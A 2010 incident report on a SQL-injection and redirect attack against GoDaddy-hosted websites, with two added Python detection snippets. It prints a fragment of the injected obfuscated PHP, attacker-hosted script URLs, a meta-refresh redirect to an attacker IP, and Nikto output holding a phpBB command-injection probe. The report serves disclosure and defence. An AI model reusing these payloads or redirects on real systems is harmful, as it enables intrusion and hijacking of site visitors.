
Website Hack Report – Case Study For Recent Website Hacks During September, October and November

Author: AITpro Admin
Published: November 2, 2010
Updated: April 4, 2011

Hack Attack details For Recent GoDaddy Website Hack
Hack Date: October 31, 2010 11:30pm PST

 * In no way, shape or form is this report intended to reflect negatively on GoDaddy web hosting. AIT-pro.com is hosted on GoDaddy and will continue to use GoDaddy web hosting. We could not be more pleased with GoDaddy's web hosting services and support.
 
Attack Method – Initial SQL injection, for the primary purpose of redirecting visitors to a specified encoded IP. On a site visit, additional payload files are downloaded and cached and used to carry out further IP redirection. The true goal appears to be masked behind several layers of subterfuge that give the appearance of a classic malware infection. The desired end result is possibly a traffic boost, but this is not conclusive; the true intention could simply have been to disrupt GoDaddy web hosting services.
 
Base64 Code Injection String (only including first line of base64 code injection for search purposes)
$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f=
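An added example (not code from the original post) of how a defender can triage strings like the one above: the fragment is not base64 but a PHP string of \xNN hex escapes, and decoding the escape runs shows that it spells out create_function. The sample lines and the watch-list of function names are constructed for this example.

```python
import re

# Constructed sample input: the injection fragment quoted in this report,
# followed by a benign line for contrast.
SAMPLE_LINES = [
    r'$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f=',
    r'$title = "Welcome to the site";',
]

# A run of four or more consecutive \xNN escapes; legitimate PHP rarely spells
# whole identifiers this way.
HEX_RUN = re.compile(r'(?:\\x[0-9a-fA-F]{2}){4,}')
# Obfuscator-style variable names such as $_8b7b
HEX_VAR = re.compile(r'\$_[0-9a-fA-F]{3,}\s*=')
# Assumed watch-list of PHP functions commonly hidden behind such encoding.
WATCH_LIST = {"create_function", "eval", "base64_decode", "gzinflate", "str_rot13", "assert"}

def decode_hex_runs(line):
    """Decode every \\xNN run in the line back to readable text, in order."""
    decoded = []
    for match in HEX_RUN.finditer(line):
        octets = re.findall(r'\\x([0-9a-fA-F]{2})', match.group(0))
        decoded.append(bytes(int(h, 16) for h in octets).decode("latin-1"))
    return decoded

def scan_line(line):
    """Return (suspicious, decoded_runs, watch_hits) for one line of PHP or database content."""
    decoded = decode_hex_runs(line)
    hits = [d for d in decoded if d in WATCH_LIST]
    # Flag a direct watch-list hit, or any hex run assigned to an obfuscator-style variable.
    suspicious = bool(hits) or (bool(decoded) and HEX_VAR.search(line) is not None)
    return suspicious, decoded, hits

def scan_lines(lines):
    """Return (line_number, decoded_runs, watch_hits) for every flagged line."""
    flagged = []
    for number, line in enumerate(lines, start=1):
        suspicious, decoded, hits = scan_line(line)
        if suspicious:
            flagged.append((number, decoded, hits))
    return flagged

if __name__ == "__main__":
    for number, decoded, hits in scan_lines(SAMPLE_LINES):
        print(f"line {number}: decoded {decoded}, watch-list hits {hits}")
```

The same scan can be run over a database dump or a tree of PHP files, since injected content of this kind lands in both places.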
 
ChLoE – Level 9
CClearHost – Non-Conclusive
Design & Intention – Non-destructive. Primary desired result: redirection to the intended IP, or disruption of services. The ultimate beneficiary is not 100% clear.
Possible Motive / Goal – Visitor traffic rank increase by redirection
Indirect Beneficiary – Host globalnet.ba. *I am not implying that globalnet.ba is responsible for this attack to increase its ranking. It is clear that they benefit indirectly from it, but there is no direct link between insomniaboldinfoorg.com and globalnet.ba other than the fact that insomniaboldinfoorg.com and the other domains launching this attack are hosted on globalnet.ba web hosting. This web host could be a victim in these attacks as well.
 
Attack Dates | IP Addresses Involved
 
Sept 17 | 77.78.239.53 (most likely other IPs in this subnet as well)
Late Sept – Early Oct | 77.78.239.53 (most likely other IPs in this subnet as well) – total of 7 different domains with same IP
Oct 19 – 21 | 77.78.239.53 (most likely other IPs in this subnet as well) – total of 3 different domains with same IP
Oct 31 11:30pm PST | 77.78.239.53, 77.78.247.28, 77.78.201.251
 
Alexa Graph
 
Although the attack dates do not match up exactly with the ranking increases displayed in the Alexa graph above, there is a definite similarity in the pattern, and all of these attacks originate from the same IP block and subnet. Other factors include how accurately the Alexa graph displays results by date (real-time vs. after a database update) and how accurately attack dates are reported (I see several conflicting dates of attack). I am only 100% positive of the data collected for Oct 31, because I personally tracked that attack from T+20 minutes to T+24 hours. Once again, this web host could also be a victim in these attacks.
 
Netrange 77.0.0.0 – 77.255.255.255
Domain insomniaboldinfoorg.com
Sarajevo Bosnia and Herzegovina
 
Known IP Addresses involved
IP 77.78.239.53
IP 77.78.247.28
IP 77.78.201.251
 
ISP
Bosnia And Herzegovina Sarajevo Globalnet Bh
inetnum: 77.78.241.0 – 77.78.247.255
netname: GLOBALNET-ISP
descr: GlobalNET BH
descr: Internet Service Provider
descr: http://www.globalnet.ba/
address: Bosnia and Herzegovina
nic-hdl: JB1004
 
Additional Payload Files involved
Javascript Files Involved (detectable)
Function: Encoder / Decoder
Javascript file yirvqjkm.js origin = IP 77.78.247.28
Full domain path to js script file >>> http://77.78.247.28/js/1/yirvqjkm.js
 
Javascript file functions.js origin = IP 77.78.247.28
Full domain path to js script file >>> http://77.78.247.28/js/functions.js
 
HTML Files Involved (detectable)
Source of HTML file
http://77.78.201.251/index.php?H20=qW&09G=C99VM9AHQ5&Lm9=XM20oJUs2K15U&3KO=0T5A1EFFMOAQS86&tsov=ZwSmlMBktyAgoKf3wAZmMGPj1GMw%3D%3D&62Z=31454OXHOJA6X077C&KaucT=TBJMlAaLyIxPx44N0RGXG1YLSR&3T=321IX6T2AA7BB&bos=SEkHM2o0fz&9zKS=022HN2RV6JX5GS2Y%2FKUUgLjd
 
Redirect code within above HTML file
<meta http-equiv="refresh" content="0; url=http://77.78.247.28/index.php?e55E=gEvW&7i8P4=5275WR6EX&nZ56= iZgcVtzKFdTUgctLQgHCQwAZQAMCWlAKj08&8iBAL=B8DJ10&d69=AA95AwYIJAUzfzR%2BKwEFCFQII&7IS= 127808F8J95PJEE&Yh=My5dICE%2BTC0nV&R068=36KQ95147W241X4ONHOWW0dEQ&V2W=GcvXDZJWg8jITlUVWhc&au=ExPAX5%2FDQUf&ff=1A0KXdzDAcBBzNnB" />
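An added example, not part of the original post, of a check that flags the kind of redirect shown above: a zero-delay meta refresh whose target is a bare IP literal on another host with a long opaque query string. The sample HTML is built from the tag quoted above, and www.example.com is assumed to be the hostname of the site being checked.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl
import ipaddress

# Constructed sample: the meta refresh tag quoted in this report.
SAMPLE_HTML = (
    '<meta http-equiv="refresh" content="0; url=http://77.78.247.28/index.php?e55E=gEvW&7i8P4=5275WR6EX'
    '&nZ56= iZgcVtzKFdTUgctLQgHCQwAZQAMCWlAKj08&8iBAL=B8DJ10&d69=AA95AwYIJAUzfzR%2BKwEFCFQII&7IS= 127808F8J95PJEE'
    '&Yh=My5dICE%2BTC0nV&R068=36KQ95147W241X4ONHOWW0dEQ&V2W=GcvXDZJWg8jITlUVWhc&au=ExPAX5%2FDQUf&ff=1A0KXdzDAcBBzNnB" />'
)

class MetaRefreshFinder(HTMLParser):
    # Collects (delay, url) pairs from every <meta http-equiv="refresh"> tag.
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag != "meta" or a.get("http-equiv", "").lower() != "refresh":
            return
        delay, _, rest = a.get("content", "").partition(";")
        url = rest.strip()
        if url.lower().startswith("url="):
            url = url[4:].strip()
        self.targets.append((delay.strip(), url))

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def assess_refresh_redirects(html_text, own_host):
    """Return one finding per meta refresh: the target host and the reasons it looks hostile."""
    finder = MetaRefreshFinder()
    finder.feed(html_text)
    findings = []
    for delay, url in finder.targets:
        parts = urlsplit(url)
        host = parts.hostname or ""
        n_params = len(parse_qsl(parts.query))  # many random-looking params is typical of this kit
        checks = [
            (delay == "0", "zero-delay"),
            (is_ip_literal(host), "ip-literal host"),
            (bool(host) and host.lower() != own_host.lower(), "off-site target"),
            (n_params >= 5, f"{n_params} opaque query parameters"),
        ]
        findings.append({"url": url, "host": host, "reasons": [r for ok, r in checks if ok]})
    return findings
```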
 
PHP Files Involved – several (not retrievable)
The remote PHP scripts that were executed appear not to have been intended to be cached, which is why they could not be retrieved.
 
DNS Lookup For 77.78.247.28
Spoof – 28.247.78.77.in-addr.arpa. IN PTR
Spoofed to United States Columbus Dod Network Information Center
 
globalnet.ba Information
nameserver: ns1.globalnet.ba
nameserver: ns2.globalnet.ba
nameserver: rns.globalnet.ba
 
Nodes to Final Destination
188.64.105.30 – Ljubljana Slovenia
77.77.197.34 – globalnet.telemach.ba
77.78.192.5 – Unknown
77.78.192.15 – globalnet.ba
 
blacklist_zone | domain | status | Submitted | Added | Rejected | Removed
whois | ba | Listed | Apr 16, 2004 9:26 EDT | Apr 16, 2004 11:07 EDT | Never | Never
 
General Info and reputation of web host
 
Globalnet.ba is a domain controlled by three name servers at globalnet.ba themselves. Two of them are on the same IP network. The primary name server is ns1.globalnet.ba. Incoming mail for globalnet.ba is handled by five mail servers at googlemail.com and google.com. Two of the mail servers share the same IP number; the four distinct IP numbers are all on different IP networks. globalnet.ba has one IP number (77.78.192.15), which also has a corresponding reverse pointer.
 
www.globalnet.ba cnames to this hostname. crtaci.gnet.ba, int.gnet.ba, www.crtaci.gnet.ba, vpsmachine.int.gnet.ba and root.vpsmachine.int.gnet.ba point to the same IP. teamwaffle.net uses this as a name server under another name. rental.ba, hackforums.net, casper.ba, nkcelik.info, bihnet.org and at least 31 other hosts share name servers with this domain. telemach.ba, irc.bolchat.org, 249.77.77.in-addr.arpa, 251.77.77.in-addr.arpa, 250.77.77.in-addr.arpa and at least two other hosts share name servers under another name with this domain. ifesgulf.com, joshua.net, fedro.com, quivive.nl, gregbiggers.com and at least 200 other hosts share mail servers with this domain. heartthegamer.com, contea.net, slimverdienen.com, hillsc.net, butysportowe.net and at least 16 other hosts share mail servers under another name with this domain. pptp-200-sa.globalnet.ba, analyzer-eth1.globalnet.ba, secure.globalnet.ba, ns4.globalnet.ba, ns3.globalnet.ba and at least 31 other hosts are subdomains of this hostname.
 
in | bgp | route record | prefix | description
AS42560 | AS42560 AS42983 | | 77.77.192.0/18 | main route block
| (unannounced) | AS42560 | 77.77.194.0/23 | TELEMACH
| (unannounced) | AS42560 | 77.77.196.0/22 | TELEMACH
| (unannounced) | AS42560 | 77.77.224.0/19 | TELEMACH
| | | 77.78.192.0/18 | GlobalNET Bosnia
| (unannounced) | AS42560 | 77.78.192.0/24 | GlobalNET Bosnia
| (unannounced) | AS42560 | 77.78.193.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.194.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.195.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.196.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.197.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.198.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.199.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.200.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.201.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.202.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.203.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.204.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.205.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.206.0/24 | GlobalNET subnet
| (unannounced) | AS42560 | 77.78.207.0/24 | GlobalNET subnet
| AS42560 | MISSING! | 77.78.239.0/24 |
| AS42560 | MISSING! | 77.78.240.0/24 |
| AS42560 | MISSING! | 77.78.248.0/24 |
| AS42560 | MISSING! | 77.78.249.0/24 |
 
Nikto Scan Results on Shared Host Server that was attacked
 
Can't locate auto/Net/SSLeay/autosplit.ix in @INC (@INC contains: C:/Perl/site/lib C:/Perl/lib .) at C:/Perl/lib/AutoLoader.pm line 173.
 at C:/Perl/lib/Net/SSLeay.pm line 61
- Nikto v2.1.3
---------------------------------------------------------------------------
+ Target IP:          173.201.92.1
+ Target Hostname:    p3nlhg43c081.shr.prod.phx3.secureserver.net
+ Target Port:        80
+ Start Time:         2010-11-07 15:55:45
---------------------------------------------------------------------------
+ Server: Apache
E:Sat Nov  6 15:55:56 2010 + ERROR: /cgi.cgi/ returned an error: error reading HTTP response
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ETag header found on server, inode: 14271895, size: 91, mtime: 0x477838c1c0907
E:Sat Nov  6 15:56:10 2010 + ERROR: /index.php3 returned an error: error reading HTTP response
+ Multiple index files found (note, these may not all be unique): default.asp, index.jhtml, index.php, index.htm, index.pl, default.htm, index.aspx, default.aspx, index.asp, index.do, index.cfm, index.cgi, index.html, index.shtml,
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
E:Sat Nov  6 15:56:21 2010 + ERROR: / returned an error: error reading HTTP response
E:Sat Nov  6 15:56:31 2010 + ERROR: / returned an error: error reading HTTP response
E:Sat Nov  6 15:56:54 2010 + ERROR: /postnuke/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 returned an error: error reading HTTP response
E:Sat Nov  6 15:57:13 2010 + ERROR: /phpBB/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 returned an error: error reading HTTP response
+ 58 items checked: 6 error(s) and 3 item(s) reported on remote host
+ End Time:           2010-11-07 15:57:23 (98 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
 
GoDaddy was notified of our findings before this information was posted. The post was released on confirmation from GoDaddy that this issue was resolved: the malicious code / worm scan results for postnuke and phpBB.
 
More about Nikto2 Open Source web server scanner…